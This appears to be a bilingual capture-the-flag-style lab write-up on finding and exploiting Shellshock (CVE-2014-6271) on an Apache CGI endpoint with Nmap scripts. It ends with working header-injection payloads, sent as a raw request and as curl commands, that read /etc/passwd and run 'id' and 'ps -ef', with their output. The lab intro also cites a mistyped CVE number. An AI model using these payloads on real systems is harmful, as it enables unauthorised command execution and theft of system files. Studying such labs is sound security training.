Vulnerability Scanning With Nmap Scripts
Chapter 9. Nmap Scripting Engine
1
2
| ifconfig
eth1: 192.152.25.2
|
Target IP Address: 192.152.25.3
1
| nmap -sV -O 192.152.25.3
|
1
| ls -al /usr/share/nmap/scripts/
|
1
| ls -al /usr/share/nmap/scripts/ | grep http
|
1
| nmap -sV -p 80 --script=http-enum 192.152.25.3
|
1
| searchsploit apache 2.4.6
|
1
| nano /usr/share/nmap/scripts/http-enum.nse
|
1
| ls -al /usr/share/nmap/scripts/ | grep vuln
|
1
| ls -al /usr/share/nmap/scripts/ | grep shellshock
|
1
| nmap -sV -p 80 --script=http-shellshock 192.152.25.3
|
1
| http://192.152.25.3/gettime.cgi
|
1
| nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.152.25.3
|
1
| ls -al /usr/share/nmap/scripts/ | grep ftp
|
Demo: Vulnerability Scanning With Nmap Scripts
Shellshock
Overview
OWASP Top 10 is an awareness document, which outlines the most critical security risks to web applications. Pentesting is performed according to the OWASP TOP 10 standard to reduce/mitigate the security risks.
In the exercise, we will focus on OWASP A9 Using Components with Known Vulnerabilities flaws and we perform attack against a web server which is vulnerable to CVE-2014-6071 .
Objective: Exploit the vulnerability and execute arbitrary commands on the target machine.
Instructions:
- This lab is dedicated to you! No other users are on this network
- Once you start the lab, you will have access to a Kali GUI instance.
- Your Kali instance has an interface with IP address 192.X.Y.2. Run “ip addr” to know the values of X and Y.
- Do not attack the gateway located at IP address 192.X.Y.1
Tasks
Pre-requisites
- Basic familiarity with TCP & UDP.
Requirements
This task does not have any requirements.
Solutions
The solution for this lab can be found in the following manual: https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf
Shellshock
概述
OWASP Top 10是一份意识文件,概述了 Web 应用程序最严重的安全风险。渗透测试是根据 OWASP TOP 10 标准执行的,以减少/减轻安全风险。
在练习中,我们将重点关注OWASP A9 使用具有已知漏洞的组件,并对易受CVE-2014-6071攻击的 Web 服务器进行攻击。
目的:利用该漏洞在目标机器上执行任意命令。
指示:
- 这个实验室是献给你的!该网络上没有其他用户
- 开始实验后,您将可以访问 Kali GUI 实例。
- 您的 Kali 实例有一个 IP 地址为 192.XY2 的接口。运行“ip addr”以了解 X 和 Y 的值。
- 不要攻击位于 IP 地址 192.XY1 的网关
任务
先决条件
- 基本熟悉 TCP 和 UDP。
要求
此任务没有任何要求。
解决方案
本实验室的解决方案可在以下手册中找到:https://assets.ine.com/labs/ad-manuals/walkthrough-1911.pdf
我自己的思路
1
2
3
4
| root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.126.145.2 netmask 255.255.255.0 broadcast 192.126.145.255
ether 02:42:c0:7e:91:02 txqueuelen 0 (Ethernet)
|
Target IP Address: 192.126.145.3
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
| root@attackdefense:~# nmap -sV -O 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 20:49 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000028s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
MAC Address: 02:42:C0:7E:91:03 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=3/30%OT=80%CT=1%CU=30230%PV=N%DS=1%DC=D%G=Y%M=0242C0%T
OS:M=6425A8A5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=107%TI=Z%CI=Z%II=I
OS:%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O
OS:5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6
OS:=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O
OS:%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%
OS:S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=40%CD=S)
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.14 seconds
|
1
2
| root@attackdefense:~# ls -al /usr/share/nmap/scripts
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep http
|
http-enum
1
2
3
4
5
6
7
8
9
10
11
12
| root@attackdefense:~# nmap -sV -p 80 --script=http-enum 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:03 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000076s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
MAC Address: 02:42:C0:7E:91:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.91 seconds
|
1
2
3
4
5
6
| root@attackdefense:~# searchsploit apache 2.4.6
Exploits: No Result
Shellcodes: No Result
Papers: No Result
root@attackdefense:~# nano /usr/share/nmap/scripts/http-enum.nse
root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep vuln
|
View page source.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <!DOCTYPE html>
<html>
<head>
<style>
body {
background-image: url('static/images/background.jpg');
background-repeat: no-repeat;
background-attachment: fixed;
background-position: center;
}
</style>
<script>
setInterval(function() {
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("output").innerHTML = this.responseText;
}
};
xhttp.open("GET", "/gettime.cgi", true);
xhttp.send();
}, 1000);
</script>
</head>
<body>
<div style="position:fixed;top:67%;left:40%" id="output" ></div>
</body>
</html>
|
http://192.126.145.3/gettime.cgi
CVE-2014-6271
1
2
| root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep shellshock
-rw-r--r-- 1 root root 5551 Jan 9 2019 http-shellshock.nse
|
Script http-shellshock
尝试利用 Web 应用程序中的“shellshock”漏洞(CVE-2014-6271 和 CVE-2014-7169)。
为了检测这个漏洞,脚本执行一个打印随机字符串的命令,然后尝试在响应主体中找到它。使用此方法不会检测到不打印回信息的 Web 应用程序。
默认情况下,脚本会在 HTTP 标头 User-Agent、Cookie 和 Referer 中注入负载。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
| root@attackdefense:~# nmap -sV -p 80 --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi" 192.126.145.3
Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-30 21:21 IST
Nmap scan report for target-1 (192.126.145.3)
Host is up (0.000045s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.6 ((Unix))
|_http-server-header: Apache/2.4.6 (Unix)
| http-shellshock:
| VULNERABLE:
| HTTP Shellshock vulnerability
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2014-6271
| This web application might be affected by the vulnerability known as Shellshock. It seems the server
| is executing commands injected via malicious HTTP headers.
|
| Disclosure date: 2014-09-24
| References:
| http://www.openwall.com/lists/oss-security/2014/09/24/10
| http://seclists.org/oss-sec/2014/q3/685
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
MAC Address: 02:42:C0:7E:91:03 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.50 seconds
|
1
| root@attackdefense:~# nmap -sV -p 80 --script http-shellshock --script-args uri=/gettime.cgi 192.126.145.3
|
1
2
3
4
5
6
7
8
9
10
| root@attackdefense:~# ls -al /usr/share/nmap/scripts/ | grep ftp
-rw-r--r-- 1 root root 4530 Jan 9 2019 ftp-anon.nse
-rw-r--r-- 1 root root 3253 Jan 9 2019 ftp-bounce.nse
-rw-r--r-- 1 root root 3108 Jan 9 2019 ftp-brute.nse
-rw-r--r-- 1 root root 3258 Jan 9 2019 ftp-libopie.nse
-rw-r--r-- 1 root root 3295 Jan 9 2019 ftp-proftpd-backdoor.nse
-rw-r--r-- 1 root root 3748 Jan 9 2019 ftp-syst.nse
-rw-r--r-- 1 root root 6007 Jan 9 2019 ftp-vsftpd-backdoor.nse
-rw-r--r-- 1 root root 5943 Jan 9 2019 ftp-vuln-cve2010-4221.nse
-rw-r--r-- 1 root root 5678 Jan 9 2019 tftp-enum.nse
|
Shellshock exploit + vulnerable environment
1
2
3
4
5
6
7
8
| GET /gettime.cgi HTTP/1.1
Host: 192.126.145.3
User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.126.145.3/
Connection: close
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
|
1
2
3
| root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://192.126.145.3/gettime.cgi
uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
1
2
3
4
5
6
7
8
9
| root@attackdefense:~# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'ps -ef'" http://192.126.145.3/gettime.cgi
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 15:17 ? 00:00:00 /usr/bin/python /usr/bin/supervisord -n
root 10 1 0 15:17 ? 00:00:00 /bin/bash /root/startup.sh
daemon 11 10 0 15:17 ? 00:00:04 /opt/apache/bin/httpd -X
daemon 12 11 0 15:17 ? 00:00:02 /opt/apache/bin/httpd -X
daemon 12062 12 0 16:25 ? 00:00:00 /usr/local/bash-4.3.0/bin/bash /opt/apache/htdocs/gettime.cgi
daemon 12063 12062 0 16:25 ? 00:00:00 ps -ef
|
